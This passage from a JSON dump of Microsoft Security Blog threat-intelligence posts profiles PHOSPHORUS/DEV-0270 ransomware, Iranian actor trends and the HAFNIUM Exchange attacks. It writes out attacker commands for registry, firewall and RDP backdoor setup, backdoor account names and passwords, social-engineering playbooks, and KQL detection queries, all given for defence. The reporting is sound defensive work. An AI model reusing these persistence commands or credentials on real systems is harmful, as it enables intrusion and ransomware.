command.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/09/DEV-0270-powershell-2.png)\n\n### Persistence\n\nTo maintain access in a compromised network, the DEV-0270 actor adds or creates a new user account, frequently named _DefaultAccount _with a password of _P@ssw0rd1234,_ to the device using the command _net user /add._ The _DefaultAccoun_t account is typically a pre-existing account set up but not enabled on most Windows systems.\n\nThe attacker then modifies the registry to allow remote desktop (RDP) connections for the device, adds a rule in the firewall using _netsh.exe_ to allow RDP connections, and adds the user to the remote desktop users group:\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v TSEnabled /t REG_DWORD /d 1 /f\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0\n \n \n \"reg\" add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD\n \n \n \"netsh\" advfirewall firewall add rule name=\"Terminal Server\" dir=in action=allow protocol=TCP localport=3389\n\nScheduled tasks are one of the recurrent methods used by DEV-0270 in their attacks to maintain access to a device. Generally, the tasks load via an XML file and are configured to run on boot with the least privilege to launch a .bat via the command prompt. The batch file results in a download of a renamed _dllhost.exe_, a reverse proxy, for maintaining control of the device even if the organization removes the file from the device.\n\n![Screenshot of scheduled tasks used by DEV-0270 actor group in their attacks.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/09/fig2-scheduled-task-in-DEV-0270-attacks-702x1024.png)Figure 2. Scheduled task used in DEV-0270 attacks\n\n### Privilege escalation\n\nDEV-0270 can usually obtain initial access with administrator or system-level privileges by injecting their web shell into a privileged process on a vulnerable web server. When the group uses Impacket\u2019s WMIExec to move to other systems on the network laterally, they are typically already using a privileged account to run remote commands. DEV-0270 also commonly dumps LSASS, as mentioned in the credential access section, to obtain local system credentials and masquerade as other local accounts which might have extended privileges.\n\nAnother form of privilege escalation used by DEV-0270 involves the creation or activation of a user account to provide it with administrator privileges. DEV-0270 uses _powershell.exe_ and _net.exe_ commands to create or enable this account and add it to the administrators\u2019 group for higher privileges.\n\n### Defense evasion\n\nDEV-0270 uses a handful of defensive evasion techniques to avoid detection. The threat actors typically turn off Microsoft Defender Antivirus real-time protection to prevent Microsoft Defender Antivirus from blocking the execution of their custom binaries. The threat group creates or activates the _DefaultAccount_ account to add it to the Administrators and Remote Desktop Users groups. The modification of the _DefaultAccount_ provides the threat actor group with a legitimate pre-existing account with nonstandard, higher privileges. DEV-0270 also uses _powershell.exe_ to load their custom root certificate to the local certificate database. This custom certificate is spoofed to appear as a legitimate Microsoft-signed certificate. However, Windows flags the spoofed certificate as invalid due to the unverified certificate signing chain. This certificate allows the group to encrypt their malicious communications to blend in with other legitimate traffic on the network.\n\nAdditionally, DEV-0270 heavily uses native LOLBins to effectively avoid detection. The threat group commonly uses native WMI, net, CMD, and PowerShell commands and registry configurations to maintain stealth and operational security. They also install and masquerade their custom binaries as legitimate processes to hide their presence. Some of the legitimate processes they masquerade their tools as include: _dllhost.exe_, _task_update.exe_, _user.exe_, and _CacheTask_. Using .bat files and _powershell.exe_, DEV-0270 might terminate existing legitimate processes, run their binary with the same process name, and then configure scheduled tasks to ensure the persistence of their custom binaries.\n\n### Lateral movement\n\nDEV-0270 has been seen creating _defaultaccount_ and adding that account to the Remote Desktop Users group. The group uses the RDP connection to move laterally, copy tools to the target device, and perform encryption.\n\nAlong with RDP, [Impacket](<https://github.com/SecureAuthCorp/impacket/>)\u2019s WMIExec is a known toolkit used by the group for lateral movement. In multiple compromises, this was the main method observed for them to pivot to additional devices in the organization, execute commands to find additional high-value targets, and dump credentials for escalating privileges.\n\nAn example of a command using Impacket\u2019s WMIExec from a remote device:\n \n \n cmd.exe /Q /c quser 1> \\\\127.0.0.1\\ADMIN$\\__1657130354.2207212 2>&1\n\n### Impact\n\nDEV-0270 has been seen using _setup.bat_ commands to enable BitLocker encryption, which leads to the hosts becoming inoperable. For workstations, the group uses _DiskCryptor_, an open-source full disk encryption system for Windows that allows for the encryption of a device's entire hard drive. The group drops _DiskCryptor_ from an RDP session and when it is launched, begins the encryption. This method does require a reboot to install and another reboot to lock out access to the workstation.\n\nThe following are DEV-0270\u2019s PowerShell commands using BitLocker:\n\n![Screenshot of PowerShell commands.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/09/DEV-0270-powershell-3-1024x566.png)\n\nMicrosoft will continue to monitor DEV-0270 and PHOSPHORUS activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Recommended mitigation steps\n\nThe techniques used by DEV-0270 can be mitigated through the following actions:\n\n * Apply the [corresponding security updates for Exchange Server](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>), including applicable fixes for [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>). While it is important to prioritize patching of internet-facing Exchange servers to mitigate risk in an ordered manner, unpatched internal Exchange Server instances should also be addressed as soon as possible.\n * For Exchange Server instances in Mainstream Support, critical product updates are released for the most recently released Cumulative Updates (CU) and for the previous CU. For Exchange Server instances in Extended Support, critical product updates are released for the most recently released CU only.\n * If you don't have a supported CU, Microsoft is producing an additional series of security updates (SUs) that can be applied to some older and unsupported CUs to help customers more quickly protect their environment. For information on these updates, see March 2021 Exchange Server Security Updates for older Cumulative Updates of Exchange Server.\n * Installing the updates is the only complete mitigation for these vulnerabilities and has no impact on functionality. If the threat actor has exploited these vulnerabilities to install malware, installing the updates _does not_ remove implanted malware or evict the actor.\n * Use [Microsoft Defender Firewall](<https://support.microsoft.com/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f>), intrusion prevention devices, and your network firewall to prevent RPC and SMB communication among devices whenever possible. This limits lateral movement and other attack activities.\n * Check your perimeter firewall and proxy to restrict or prevent network appliances like Fortinet SSL VPN devices from making arbitrary connections to the internet to browse or download files.\n * Enforce strong local administrator passwords. Use tools like [LAPS](<https://docs.microsoft.com/previous-versions/mt227395\$v=msdn.10\$?redirectedfrom=MSDN>).\n * Ensure that [Microsoft Defender Antivirus](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows?view=o365-worldwide>) is up to date and that real-time behavior monitoring is enabled.\n * Keep backups so you can recover data affected by destructive attacks. Use controlled folder access to prevent unauthorized applications from modifying protected files.\n * Turn on the following [attack surface reduction rules](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) to block or audit activity associated with this threat:\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n * Block process creations originating from PsExec and WMI commands\n * Block persistence through WMI event subscription. Ensure that Microsoft Defender for Endpoint is up to date and that real-time behavior monitoring is enabled\n\n## Detection details\n\n### Microsoft Defender for Endpoint\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Malware associated with DEV-0270 activity group detected\n\nThe following additional alerts may also indicate activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\nA script with suspicious content was observed| Suspicious file dropped by Exchange Server process \n---|--- \nA suspicious file was observed| Suspicious Modify Registry \nAnomalous behavior by a common executable| Suspicious Permission Groups Discovery \nLazagne post-exploitation tool| Suspicious PowerShell command line \nLocal Emails Collected| Suspicious PowerShell download or encoded command execution \nMimikatz credential theft tool| Suspicious Process Discovery \n'Mimilove' high-severity malware was prevented| Suspicious process executed PowerShell command \nNew group added suspiciously| Suspicious process launched using dllhost.exe \nOngoing hands-on-keyboard attack via Impacket toolkit| Suspicious 'PShellCobStager' behavior was blocked \nPossible Antimalware Scan Interface (AMSI) tampering| Suspicious Scheduled Task Process Launched \nPossible attempt to discover groups and permissions| Suspicious sequence of exploration activities \nPossible exploitation of Exchange Server vulnerabilities| Suspicious 'SuspExchgSession' behavior was blocked \nPossible exploitation of ProxyShell vulnerabilities| Suspicious System Network Configuration Discovery \nPossible web shell installation| Suspicious System Owner/User Discovery \nProcess memory dump| Suspicious Task Scheduler activity \nSuspicious Account Discovery: Email Account| Suspicious User Account Discovery \nSuspicious behavior by cmd.exe was observed| Suspicious user password change \nSuspicious behavior by svchost.exe was observed| Suspicious w3wp.exe activity in Exchange \nSystem file masquerade \nSuspicious behavior by Web server process| Tampering with the Microsoft Defender for Endpoint sensor \nSuspicious Create Account| Unusual sequence of failed logons \nSuspicious file dropped| WDigest configuration change \n \n## Hunting queries\n\n### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for the related malicious activity in their environments.\n\n**DEV-0270 registry IOC**\n\nThis query identifies modification of registry by DEV-0270 actor to disable security feature as well as to add ransom notes:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270RegistryIOCSep2022.yaml>\n\n**DEV-0270 malicious PowerShell usage**\n\nDEV-0270 heavily uses PowerShell to achieve their objective at various stages of their attack. This query locates PowerShell activity tied to the actor:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270PowershellSep2022.yaml>\n\n**DEV-0270 WMIC discovery**\n\nThis query identifies _dllhost.exe_ using WMIC to discover additional hosts and associated domains in the environment:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270WMICDiscoverySep2022.yaml>\n\n**DEV-0270 new user creation**\n\nThis query tries to detect creation of a new user using a known DEV-0270 username/password schema:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270NewUserSep2022.yaml>\n\n### Microsoft 365 Defender\n\nTo locate possible actor activity, run the following queries.\n\n**Disable services via registry** \nSearch for processes modifying the registry to disable security features. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Disabling%20Services%20via%20Registry.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all(@\u2019\u201dreg\u201d\u2019, \u2018add\u2019, @\u2019\u201dHKLM\\SOFTWARE\\Policies\\\u2019, \u2018/v\u2019,\u2019/t\u2019, \u2018REG_DWORD\u2019, \u2018/d\u2019, \u2018/f\u2019)\n and InitiatingProcessCommandLine has_any(\u2018DisableRealtimeMonitoring\u2019, \u2018UseTPMKey\u2019, \u2018UseTPMKeyPIN\u2019, \u2018UseAdvancedStartup\u2019, \u2018EnableBDEWithNoTPM\u2019, \u2018RecoveryKeyMessageSource\u2019)\n\n**Modifying the registry to add a ransom message notification**\n\nIdentify registry modifications that are indicative of a ransom note tied to DEV-0270. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Modifying%20the%20registry%20to%20add%20a%20ransom%20message%20notification.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all(\u2018\u201dreg\u201d\u2019, \u2018add\u2019, @\u2019\u201dHKLM\\SOFTWARE\\Policies\\\u2019, \u2018/v\u2019,\u2019/t\u2019, \u2018REG_DWORD\u2019, \u2018/d\u2019, \u2018/f\u2019, \u2018RecoveryKeyMessage\u2019, \u2018Your drives are Encrypted!\u2019, \u2018@\u2019)\n\n**DLLHost.exe file creation via PowerShell**\n\nIdentify masqueraded _DLLHost.exe_ file created by PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/DLLHost.exe%20file%20creation%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \u2018powershell.exe\u2019\n | where InitiatingProcessCommandLine has_all(\u2018$file=\u2019, \u2018dllhost.exe\u2019, \u2018Invoke-WebRequest\u2019, \u2018-OutFile\u2019)\n\n**Add malicious user to Admins and RDP users group via PowerShell**\n\nLook for adding a user to Administrators in remote desktop users via PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Add%20malicious%20user%20to%20Admins%20and%20RDP%20users%20group%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ 'powershell.exe'\n | where InitiatingProcessCommandLine has_all('$admins=', 'System.Security.Principal.SecurityIdentifier', 'Translate', '-split', 'localgroup', '/add', '$rdp=')\n\n**Email data exfiltration via PowerShell**\n\nIdentify email exfiltration conducted by PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where FileName =~ 'powershell.exe'\n | where ProcessCommandLine has_all('Add-PSSnapin', 'Get-Recipient', '-ExpandProperty', 'EmailAddresses', 'SmtpAddress', '-hidetableheaders')\n\n**Create new user with known DEV-0270 username/password** \nSearch for the creation of a new user using a known DEV-0270 username/password schema. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Create%20new%20user%20with%20known%20DEV-0270%20username%20and%20password.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all('net user', '/add')\n | parse InitiatingProcessCommandLine with * \"user \" username \" \"*\n | extend password = extract(@\"\\buser\\s+[^\\s]+\\s+([^\\s]+)\", 1, InitiatingProcessCommandLine)\n | where username in('DefaultAccount') or password in('P@ssw0rd1234', '_AS_@1394')\n\n**PowerShell adding exclusion path for Microsoft Defender of ProgramData**\n\nIdentify PowerShell creating an exclusion path of ProgramData directory for Microsoft Defender to not monitor. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/PowerShell%20adding%20exclusion%20path%20for%20Microsoft%20Defender%20of%20ProgramData.yaml>)\n \n \n DeviceProcessEvents\n | where FileName =~ \"powershell.exe\" and ProcessCommandLine has_all(\"try\", \"Add-MpPreference\", \"-ExclusionPath\", \"ProgramData\", \"catch\")\n \n\n**DLLHost.exe WMIC domain discovery**\n\nIdentify dllhost.exe using WMIC to discover additional hosts and associated domain. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/DLLHost.exe%20WMIC%20domain%20discovery.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"dllhost.exe\" and InitiatingProcessCommandLine == \"dllhost.exe\"\n | where ProcessCommandLine has \"wmic computersystem get domain\"\n \n\nThe post [Profiling DEV-0270: PHOSPHORUS\u2019 ransomware operations](<https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-07T21:00:00", "type": "mssecure", "title": "Profiling DEV-0270: PHOSPHORUS\u2019 ransomware operations", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-44228"], "modified": "2022-09-07T21:00:00", "id": "MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "href": "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-19T19:09:58", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends in Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n![Timeline showing dates, threat actor, and malware payload of ransomware attacks by Iranian threat actors](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Fig1b-ransomware-timeline.png)\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were fitting for actions on objectives. On select victims, operators created local administrator accounts with a with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n![Screenshot of code for adding a user ](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/code-1.png)\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n![Screenshot of ransom message](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/code-2.png)\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers have followed the following playbook:\n\n * Masquerade as an attractive woman on social media\n * Establish a connection via social media with a target user via LinkedIn, Facebook, etc.\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications which allows them to build trust and confidence with the target. In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n![Bar chart showing activity per hour](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Fig2-DEV-0343-observed-operating-hours.png)\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n![Bar chart showing requests per day](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Fig3-DEV-0343-observed-actor-requests-per-day.png)\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mssecure", "title": "Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-11-16T16:00:08", "id": "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "href": "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T12:09:16", "description": "_**Update [03/08/2021]**: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with on-premises Exchange Server. To aid defenders in investigating these attacks where Microsoft security products and tooling may not be deployed, we are releasing a feed of observed indicators of compromise (IOCs). The feed of malware hashes and known malicious file paths observed in related attacks is available in both JSON and CSV formats at the below GitHub links. This information is being shared as TLP:WHITE._\n\n * [CSV format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>)\n * [JSON format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>)\n\n_**Update [03/05/2021]**: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM. To aid customers in investigating these attacks, __Microsoft Security Response Center (MSRC) has provided additional resources, including new mitigation guidance: [Microsoft Exchange Server Vulnerabilities Mitigations \u2013 March 2021](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>)_\n\n_**Update [03/04/2021]**: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise._\n\n \n\nMicrosoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to [HAFNIUM](<https://blogs.microsoft.com/on-the-issues/?p=64505>), a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\nThe vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today\u2019s [Microsoft Security Response Center (MSRC) release - Multiple Security Updates Released for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.\n\nWe are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious 